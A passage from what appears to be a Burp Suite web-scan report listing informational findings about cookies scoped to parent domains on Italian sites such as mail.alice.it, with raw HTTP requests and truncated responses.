GET /add HTTP/1.1
Host: it.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:25:38 GMT
Set-Cookie: B=b85h77h6rubr2&b=3&s=u7; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Location: http://it.add.yahoo.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Server: YTS/1.20.0

<html><body>This page has moved, please <a href="http://it.add.yahoo.com/">click here</a> to go to its new location.</body></html><!-- w95.fp.re1.yahoo.com uncompressed/chunked Mon May 2 15:25:38 PDT
...[SNIP]...

14.43. http://local.virgilio.it/scripts/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.virgilio.it
Path:   /scripts/jquery.cookie.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.cookie.js HTTP/1.1
Host: local.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:50 GMT
Server: Apache
Set-Cookie: kp=173.193.214.243.1304374430919936; path=/; expires=Thu, 29-Apr-21 22:13:50 GMT; domain=.virgilio.it
Last-Modified: Tue, 19 Apr 2011 14:59:54 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 22:13:50 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 998

eval(function(p,a,c,k,e,r){e=function(c){return (c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36));};if(!"".replace(/^/,String)){while(c--){r[e(c)]=k[c]||e(c);}k=[function
...[SNIP]...

14.44. http://mail.alice.it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mail.alice.it
Proxy-Connection: keep-alive
Referer: http://burp/show/3
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slat=1304375040

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:25 GMT
Server: Apache
Set-Cookie: kp=1304375425884687; path=/; expires=Thu, 29-Apr-21 22:30:25 GMT; domain=.alice.it
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Alice Mail: e-mail gratis e posta elettronica sicura</title>
<meta http-equi
...[SNIP]...

14.45. http://mail.alice.it/common/VIRGILIO/header2008/stili/header_alice.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /common/VIRGILIO/header2008/stili/header_alice.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/VIRGILIO/header2008/stili/header_alice.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:38 GMT
Server: Apache
Set-Cookie: kp=1304375378741245; path=/; expires=Thu, 29-Apr-21 22:29:38 GMT; domain=.alice.it
Last-Modified: Wed, 15 Dec 2010 14:42:25 GMT
ETag: "81a92-62f-f20fd640"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 1583

#header, #header .topH a.vlogo, #header .contenutiH h1 a strong, #header .contenutiH form, #header .contenutiH form a.submit, #header .contenutiH .telecom {background:url("/images/header/immagine.png"
...[SNIP]...

14.46. http://mail.alice.it/css/popup.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/popup.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/popup.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:37 GMT
Server: Apache
Set-Cookie: kp=1304375377467066; path=/; expires=Thu, 29-Apr-21 22:29:37 GMT; domain=.alice.it
Last-Modified: Tue, 14 Dec 2010 11:34:23 GMT
ETag: "262b96-1c32-33c2cdc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 7218

body {font-family:Arial, FreeSans, sans-serif; font-size: 11px; background:#eaeef1 url("/images/bg.gif") repeat-x 0 0; margin:0; padding:0}
body#snd {font-family:Tahoma; font-size: 11px; background:#F
...[SNIP]...

14.47. http://mail.alice.it/css/stili.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/stili.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/stili.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:37 GMT
Server: Apache
Set-Cookie: kp=1304375377261127; path=/; expires=Thu, 29-Apr-21 22:29:37 GMT; domain=.alice.it
Last-Modified: Fri, 01 Apr 2011 09:22:36 GMT
ETag: "262b90-9995-f3540f00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 39317

/*BODY*/
   @import url("/common/VIRGILIO/header2008/stili/header_alice.css");

    * {margin:0;padding:0;}
   /* NORMALE*/ body {/*margin:3px 0 5px 0;*/ background-color:#FFFFFF;/* url(../images/bg_1px_bod
...[SNIP]...

14.48. http://mail.alice.it/css/stili_overwrite.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/stili_overwrite.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/stili_overwrite.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:40 GMT
Server: Apache
Set-Cookie: kp=1304375380042730; path=/; expires=Thu, 29-Apr-21 22:29:40 GMT; domain=.alice.it
Last-Modified: Fri, 01 Apr 2011 09:22:36 GMT
ETag: "262b9e-b3c-f3540f00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 2876

.conthome .visulhead { background:url(../images/hp/mail_alice_michelle_2011_v3.jpg) no-repeat 0 0;}
#registra_gratis_adsl { float:left; margin-right:25px; margin-left:10px; }
#registra_gratis_tim { }

...[SNIP]...

14.49. http://mail.alice.it/css/stili_stampa.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/stili_stampa.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/stili_stampa.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:42 GMT
Server: Apache
Set-Cookie: kp=1304375382444777; path=/; expires=Thu, 29-Apr-21 22:29:42 GMT; domain=.alice.it
Last-Modified: Tue, 04 Nov 2008 09:56:40 GMT
ETag: "262b94-57ca-147dc600"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 22474

/*BODY*/
    * {margin:0;padding:0;}@page {size: 210mm 297mm; margin: 30mm;}
   /* NORMALE*/ body {margin:3px 0 5px 0;background:#FFFFFF ;font: 11px Arial, Helvetica,    sans-serif;}
   .clear {clear:both;
...[SNIP]...

14.50. http://mail.alice.it/images/bg_bottombox0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/bg_bottombox0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg_bottombox0.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:46 GMT
Server: Apache
Set-Cookie: kp=1304375386378621; path=/; expires=Thu, 29-Apr-21 22:29:46 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:48:37 GMT
ETag: "4259de-614-f486a740"
Accept-Ranges: bytes
Content-Length: 1556
Content-Type: image/gif

GIF89a.......................................................................................................!.......,.............!cI.f..j..n..rM.v..z... p(,...$r.l2..(t*.R..,v...0..xL.....z.n....|N.
...[SNIP]...

14.51. http://mail.alice.it/images/bg_pop.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/bg_pop.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg_pop.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:38 GMT
Server: Apache
Set-Cookie: kp=1304375378737662; path=/; expires=Thu, 29-Apr-21 22:29:38 GMT; domain=.alice.it
Last-Modified: Mon, 03 Nov 2008 09:02:47 GMT
ETag: "cf3200-182-35f2bbc0"
Accept-Ranges: bytes
Content-Length: 386
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

14.52. http://mail.alice.it/images/bt_registrati00.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/bt_registrati00.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bt_registrati00.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385160330; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Wed, 17 Sep 2008 09:37:28 GMT
ETag: "4259cd-b3e-3771a600"
Accept-Ranges: bytes
Content-Length: 2878
Content-Type: image/gif

GIF89a..1.....3E..........Vd.3E.ft.............ft..&.3E.#6.Ud.EX..&."6.....&..&.... 4...............................................................................DU............................w.....
...[SNIP]...

14.53. http://mail.alice.it/images/butt_registrati.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/butt_registrati.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butt_registrati.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:48 GMT
Server: Apache
Set-Cookie: kp=1304375388266392; path=/; expires=Thu, 29-Apr-21 22:29:48 GMT; domain=.alice.it
Last-Modified: Mon, 14 Jun 2010 10:30:44 GMT
ETag: "89dc9c-d61-fb2bdd00"
Accept-Ranges: bytes
Content-Length: 3425
Content-Type: image/png

.PNG
.
...IHDR.......+......).Y....tEXtSoftware.Adobe ImageReadyq.e<...IDATx..\kPT.......e...KA....M.M.6.hf...N.)Z...1..M.6m..L3M....~H...h.4.`g.HT6..DT 6.1...Y`.,....w....].V@....;w.=....;..9.!.y
...[SNIP]...

14.54. http://mail.alice.it/images/header/immagine.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/header/immagine.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/header/immagine.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:46 GMT
Server: Apache
Set-Cookie: kp=1304375386383663; path=/; expires=Thu, 29-Apr-21 22:29:46 GMT; domain=.alice.it
Last-Modified: Mon, 14 Jun 2010 10:31:05 GMT
ETag: "11c600-3fbd-fc6c4c40"
Accept-Ranges: bytes
Content-Length: 16317
Content-Type: image/png

.PNG
.
...IHDR................m...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

14.55. http://mail.alice.it/images/ico_busta_link.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_busta_link.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_busta_link.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:46 GMT
Server: Apache
Set-Cookie: kp=1304375386492394; path=/; expires=Thu, 29-Apr-21 22:29:46 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:14:24 GMT
ETag: "4259e0-411-7a285c00"
Accept-Ranges: bytes
Content-Length: 1041
Content-Type: image/gif

GIF89a.......R.#W.)..q..~.....k.........P.....t.NN.._{...{s.L.....k.........X.+......P..............[................................Fv..........Q..r.........................a...V........O..[.........
...[SNIP]...

14.56. http://mail.alice.it/images/ico_disc_red.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_disc_red.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_disc_red.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385295016; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 07:49:58 GMT
ETag: "4259d9-42-4c335580"
Accept-Ranges: bytes
Content-Length: 66
Content-Type: image/gif

GIF89a........kk....BB.......55......!.......,...........HR.U@...;

14.57. http://mail.alice.it/images/ico_preferiti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_preferiti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_preferiti.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:48 GMT
Server: Apache
Set-Cookie: kp=1304375388041112; path=/; expires=Thu, 29-Apr-21 22:29:48 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:12:19 GMT
ETag: "4259dc-3fa-72b502c0"
Accept-Ranges: bytes
Content-Length: 1018
Content-Type: image/gif

GIF89a..........g............~........u......d..........A.................}]....x.........3i...|...f..0e...@..f........r..S.....l.....$..9..I..j.....w..C..F.....n.....A...^....8B}...C...d.......=..pk
...[SNIP]...

14.58. http://mail.alice.it/images/ico_stampa.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_stampa.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_stampa.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:48 GMT
Server: Apache
Set-Cookie: kp=1304375388512456; path=/; expires=Thu, 29-Apr-21 22:29:48 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:13:39 GMT
ETag: "4259dd-243-7779b6c0"
Accept-Ranges: bytes
Content-Length: 579
Content-Type: image/gif

GIF89a.....P.......~.....Gun..T~.......x.....Dn....b........u.................)S.......c..l..t...........Z..............i...........y..p..@j....Bl.....Iw..................o........g...Hv...r..5_....(
...[SNIP]...

14.59. http://mail.alice.it/images/ico_vverde15.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_vverde15.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_vverde15.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385156858; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Thu, 25 Sep 2008 08:40:26 GMT
ETag: "5fe6ab-414-5a351280"
Accept-Ranges: bytes
Content-Length: 1044
Content-Type: image/gif

GIF89a..........R.#S.$N..P. S.#T.%T.$......R."O.....F..Q.!......M.....H..Q. ...V.(L..z.T.........y.R......Q."f.:M.....L......................z..{U.'......_.3............I.....h.?U.&c.8s.M...}.Ym.EK...
...[SNIP]...

14.60. http://mail.alice.it/images/ico_xrosso15.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_xrosso15.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_xrosso15.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385155948; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Thu, 25 Sep 2008 09:42:12 GMT
ETag: "eb957-412-371a2500"
Accept-Ranges: bytes
Content-Length: 1042
Content-Type: image/gif

GIF89a......................................................................2G.......2E....r..0F..............B. ,..(.... ,.......I\....CP....................#......BN.......cr................L_....
...[SNIP]...

14.61. http://mail.alice.it/js/scriptflash.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /js/scriptflash.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/scriptflash.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:47 GMT
Server: Apache
Set-Cookie: kp=1304375387874728; path=/; expires=Thu, 29-Apr-21 22:29:47 GMT; domain=.alice.it
Last-Modified: Tue, 04 Nov 2008 10:52:14 GMT
ETag: "aaf778-743-db369380"
Accept-Ranges: bytes
Content-Length: 1859
Content-Type: application/x-javascript

// JavaScript Document
function includeSwf(width,height,src,flashvars)
{
   document.write (
'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"\n'+
    'codebase="http://download.ma
...[SNIP]...

14.62. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=21392;evt=16670;cat1=20430;cat2=20431;rand='%20+%20Math.round(Math.random()*10000000)%20+%20' HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pjw=BAEAAAACIAMDfqe+TSAGAQABIAMC6HgEYAcCb10IIA1AEwEAAA==; vt=9556:293096:548207:53962:0:1304340350:1|; adv_ic=BwEAAAB+p75NIAYGAAFJAAC0ViAHIAsDAAAAAA==; lyc=AwAAAARv+75NACAAAWVfIASgAARbUwAAcuAKF+ADAOAFLwEAAA==; pluto=822523287793|v1

Response

HTTP/1.1 302 Redirect
Date: Mon, 02 May 2011 22:13:52 GMT
Location: https://www.googleadservices.com/pagead/conversion/1022934834/?label=2HoJCPStogIQsv7i5wM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARv+75NACAAAWVfIASgAARbUwAAcuAKF0AAAqAsv2AvAJAgI8AAAZdVwAngBRcDz08AAA==; domain=.fastclick.net; path=/; expires=Wed, 01-May-2013 22:13:52 GMT
Set-Cookie: pluto=822523287793|v1; domain=.fastclick.net; path=/; expires=Wed, 01-May-2013 22:13:52 GMT


14.63. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

